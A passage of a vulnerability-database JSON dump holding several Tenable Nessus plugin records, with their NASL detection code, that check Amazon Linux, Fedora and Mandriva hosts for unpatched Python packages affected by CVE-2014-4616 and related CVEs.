that Python built-in _json module has a flaw (insufficient bounds checking), which allows a local user to read arbitrary memory of the current process.\n\nQuoting the upstream bug report :\n\n'The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.'", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-10-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : python-simplejson (ALAS-2014-374)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2018-11-19T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:python-simplejson", "p-cpe:/a:amazon:linux:python-simplejson-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-374.NASL", "href": "https://www.tenable.com/plugins/nessus/78317", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-374.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78317);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/19 11:02:41\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_xref(name:\"ALAS\", value:\"2014-374\");\n\n script_name(english:\"Amazon Linux AMI : python-simplejson 
(ALAS-2014-374)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was reported that Python built-in _json module have a flaw\n(insufficient bounds checking), which allows a local user to read\ncurrent process' arbitrary memory.\n\nQuoting the upstream bug report :\n\n'The sole prerequisites of this attack are that the attacker is able\nto control or influence the two parameters of the default scanstring\nfunction: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index\nvalue. The index value is then used directly as an index to an array\nin the C code; internally the address of the array and its index are\nadded to each other in order to yield the address of the value that is\ndesired. However, by supplying a negative index value and adding this\nto the address of the array, the processor's register value wraps\naround and the calculated value will point to a position in memory\nwhich isn't within the bounds of the supplied string, causing the\nfunction to access other parts of the process memory.'\"\n );\n # http://bugs.python.org/issue21529\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.python.org/issue21529\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-374.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update python-simplejson' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:python-simplejson\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python-simplejson-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"python-simplejson-3.5.3-1.7.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python-simplejson-debuginfo-3.5.3-1.7.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-simplejson / python-simplejson-debuginfo\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:07:11", "description": "Fix for CVE-2014-4616\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-07-01T00:00:00", "type": "nessus", "title": "Fedora 20 : python-2.7.5-13.fc20 (2014-7800)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-7800.NASL", "href": "https://www.tenable.com/plugins/nessus/76328", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7800.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76328);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-7800\");\n\n script_name(english:\"Fedora 20 : python-2.7.5-13.fc20 (2014-7800)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4616\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134903.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8c74e51\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" 
>!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"python-2.7.5-13.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:12:27", "description": "Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-14T00:00:00", "type": "nessus", "title": "Fedora 19 : python3-3.3.2-10.fc19 (2014-14257)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-14257.NASL", "href": "https://www.tenable.com/plugins/nessus/79238", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14257.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79238);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-14257\");\n\n script_name(english:\"Fedora 19 : python3-3.3.2-10.fc19 (2014-14257)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143576.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e3b06ef1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || 
\"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"python3-3.3.2-10.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:11:38", "description": "Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-11T00:00:00", "type": "nessus", "title": "Fedora 21 : python3-3.4.1-16.fc21 (2014-14208)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-14208.NASL", "href": "https://www.tenable.com/plugins/nessus/79095", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14208.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79095);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-14208\");\n\n script_name(english:\"Fedora 21 : python3-3.4.1-16.fc21 (2014-14208)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143191.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bb72edb4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || 
\"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"python3-3.4.1-16.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:11:43", "description": "Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-10T00:00:00", "type": "nessus", "title": "Fedora 20 : python3-3.3.2-18.fc20 (2014-14245)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-14245.NASL", "href": "https://www.tenable.com/plugins/nessus/79076", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14245.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79076);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-14245\");\n\n script_name(english:\"Fedora 20 : python3-3.3.2-18.fc20 (2014-14245)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/142831.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d288d8e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || 
\"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"python3-3.3.2-18.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:46:47", "description": "Updated python3 packages fix security vulnerabilities :\n\nZipExtFile.read goes into 100% CPU infinite loop on maliciously binary edited zips (CVE-2013-7338).\n\nA vulnerability was reported in Python's socket module, due to a boundary error within the sock_recvfrom_into() function, which could be exploited to cause a buffer overflow. This could be used to crash a Python application that uses the socket.recvfrom_info() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912).\n\nIt was reported that a patch added to Python 3.2 caused a race condition where a file created could be created with world read/write permissions instead of the permissions dictated by the original umask of the process. This could allow a local attacker that could win the race to view and edit files created by a program using this call. 
Note that prior versions of Python, including 2.x, do not include the vulnerable _get_masked_mode() function that is used by os.makedirs() when exist_ok is set to True (CVE-2014-2667).\n\nPython is susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The bug is caused by allowing the user to supply a negative value that is used as an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded path separators in URLs. This may enable attackers to disclose a CGI script's source code or execute arbitrary scripts in the server's document root (CVE-2014-4650).", "cvss3": {"score": null, "vector": null}, "published": "2015-03-30T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : python3 (MDVSA-2015:076)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7338", "CVE-2014-1912", "CVE-2014-2667", "CVE-2014-4616", "CVE-2014-4650"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64python3-devel", "p-cpe:/a:mandriva:linux:lib64python3.3", "p-cpe:/a:mandriva:linux:python3", "p-cpe:/a:mandriva:linux:python3-docs", "p-cpe:/a:mandriva:linux:tkinter3", "p-cpe:/a:mandriva:linux:tkinter3-apps", "cpe:/o:mandriva:business_server:2"], "id": "MANDRIVA_MDVSA-2015-076.NASL", "href": "https://www.tenable.com/plugins/nessus/82329", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:076. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82329);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7338\", \"CVE-2014-1912\", \"CVE-2014-2667\", \"CVE-2014-4616\", \"CVE-2014-4650\");\n script_xref(name:\"MDVSA\", value:\"2015:076\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python3 (MDVSA-2015:076)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python3 packages fix security vulnerabilities :\n\nZipExtFile.read goes into 100% CPU infinite loop on maliciously binary\nedited zips (CVE-2013-7338).\n\nA vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a 